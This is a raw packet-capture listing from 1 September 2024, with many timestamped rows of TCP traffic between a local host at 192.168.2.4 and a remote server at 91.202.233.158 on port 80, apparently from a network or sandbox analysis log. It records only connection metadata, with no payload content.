Sep 1, 2024 18:28:22.366487980 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366532087 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366621971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366658926 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366738081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366748095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366764069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366774082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366774082 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366782904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366791964 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366791964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366802931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366810083 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366815090 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366835117 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366849899 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367010117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367021084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367032051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367046118 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367049932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367059946 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367070913 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367074013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367085934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367094994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367094994 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367106915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367106915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367116928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367132902 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367152929 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367393970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367403984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367438078 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367583990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367592096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367599964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367614031 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367624044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367624998 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367635012 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367645025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367645025 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367655039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367656946 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367665052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367685080 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367718935 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367875099 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367885113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367892981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367909908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367913008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367919922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367929935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367935896 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367939949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367950916 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367960930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367960930 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367970943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.367973089 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.367981911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368000031 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368021011 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368294954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368303061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368310928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368320942 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368329048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368330956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368340969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368350983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368352890 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368375063 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368386030 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368479967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368494034 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368505001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368514061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368520975 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368527889 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368550062 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368742943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368752956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368761063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368771076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368778944 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368791103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368796110 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368805885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368814945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368817091 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368829012 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368837118 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368840933 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368846893 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368855000 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368865013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368874073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368875980 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368882895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368889093 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368894100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368905067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368907928 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368916035 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368920088 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368926048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368937016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.368942976 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368963957 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.368972063 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.369543076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369553089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369560957 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369571924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369581938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369585991 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.369591951 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369600058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369607925 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.369610071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369618893 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369626045 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.369631052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369640112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369643927 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.369649887 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369654894 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.369659901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369668961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369679928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369683027 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.369689941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369699955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369705915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.369709969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369724989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369725943 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.369730949 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.369735956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.369755030 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.369780064 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.370121002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.370138884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.370167971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.370182991 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.452634096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.452685118 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.452692986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.452704906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.452733040 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.452744961 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.452776909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.452786922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.452797890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.452805996 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.452827930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.452836990 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.452908039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.452918053 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.452928066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.452939987 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.452954054 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.452970028 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.452971935 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.452980995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453003883 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453013897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453022003 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453032970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453043938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453051090 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453072071 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453083992 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453233004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453243017 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453255892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453269958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453273058 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453280926 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453284025 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453293085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453300953 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453330040 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453480005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453490973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453501940 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453512907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453517914 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453524113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453533888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453546047 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453569889 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453605890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453639984 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453649044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453660965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453669071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453684092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453691959 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453710079 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453768015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453783989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453803062 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453819036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453864098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453876019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453885078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453896999 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453901052 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453907967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453907967 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453918934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453928947 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453931093 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453938961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.453953981 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453973055 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.453986883 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454130888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454171896 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454278946 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454289913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454299927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454310894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454322100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454325914 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454332113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454341888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454350948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454355001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454365015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454366922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454376936 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454386950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454389095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454405069 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454427004 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454600096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454615116 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454636097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454659939 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454718113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454729080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454739094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454750061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454761028 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454756975 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454771042 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454771996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454782963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454792976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454801083 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454803944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454813957 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.454818964 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454834938 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.454849005 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455204010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455215931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455225945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455236912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455241919 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455248117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455255032 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455259085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455269098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455281019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455282927 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455295086 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455296040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455321074 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455343008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455511093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455521107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455535889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455549002 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455555916 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455560923 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455573082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455579996 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455584049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455591917 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455595016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455605984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455610991 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455617905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455625057 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455630064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455641031 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455642939 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455651999 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455663919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455666065 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455683947 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455693960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455702066 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455704927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455714941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455725908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455729008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455738068 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455745935 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455749035 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455754042 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455760002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455770969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.455782890 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455795050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.455822945 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.456290960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456301928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456331015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.456341028 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.456526041 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456537008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456546068 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456557035 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456567049 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.456567049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456578016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456588984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456589937 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.456598997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456612110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456621885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456624031 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.456633091 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.456634998 CEST	56177	80	192.168.2.4	91.202.233.158
